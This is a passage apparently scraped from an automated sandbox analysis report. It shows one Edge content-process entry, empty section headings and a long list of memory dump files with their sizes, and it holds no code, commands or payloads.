                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:8116

                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                      • memory/656-273-0x00000000004B0000-0x00000000004B1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/1092-281-0x000002081CCF0000-0x000002081CCF1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2780-236-0x0000000000B30000-0x0000000000B31000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/2780-245-0x0000000001270000-0x0000000001271000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/3928-132-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.5MB

                                                                                                                                                                                                                      • memory/3928-142-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        100KB

                                                                                                                                                                                                                      • memory/3928-133-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        152KB

                                                                                                                                                                                                                      • memory/3928-131-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        572KB

                                                                                                                                                                                                                      • memory/4164-160-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4164-187-0x00000000013D0000-0x00000000013D1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4220-218-0x0000000000880000-0x0000000000881000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-196-0x0000000006D80000-0x0000000006D81000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-211-0x0000000007510000-0x0000000007511000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-207-0x0000000006D00000-0x0000000006D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-208-0x00000000074A0000-0x00000000074A1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-223-0x0000000007F90000-0x0000000007F91000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-194-0x00000000042D0000-0x00000000042D1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-214-0x0000000008020000-0x0000000008021000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-209-0x0000000007760000-0x0000000007761000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-210-0x00000000078A0000-0x00000000078A1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-213-0x00000000075C0000-0x00000000075C1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-212-0x0000000007D00000-0x0000000007D01000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4264-206-0x0000000006C70000-0x0000000006C71000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4280-163-0x00000000000A0000-0x00000000000A1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4364-233-0x0000000000E50000-0x0000000000E51000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4364-265-0x0000000008600000-0x0000000008601000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4364-248-0x0000000001550000-0x0000000001551000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4364-268-0x0000000008100000-0x0000000008101000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4388-204-0x000001F7D40A0000-0x000001F7D411E000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        504KB

                                                                                                                                                                                                                      • memory/4388-192-0x000001F7B6CF0000-0x000001F7B6CFB000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        44KB

                                                                                                                                                                                                                      • memory/4388-199-0x000001F7D1080000-0x000001F7D1081000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4388-181-0x000001F7B6870000-0x000001F7B6871000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4668-229-0x00000000003E0000-0x00000000003E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4784-201-0x0000000000C90000-0x0000000000C91000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4784-256-0x00000000064B0000-0x00000000064B1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4784-263-0x0000000006640000-0x0000000006641000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4784-240-0x0000000005A70000-0x0000000005A93000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        140KB

                                                                                                                                                                                                                      • memory/4784-203-0x00000000054E0000-0x00000000054E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4784-253-0x0000000006C10000-0x0000000006C11000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/4784-244-0x00000000063B0000-0x00000000063CD000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        116KB

                                                                                                                                                                                                                      • memory/4784-258-0x0000000006710000-0x0000000006711000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5040-243-0x00000000007B0000-0x00000000007B1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                      • memory/5148-299-0x0000000000A40000-0x0000000000A41000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB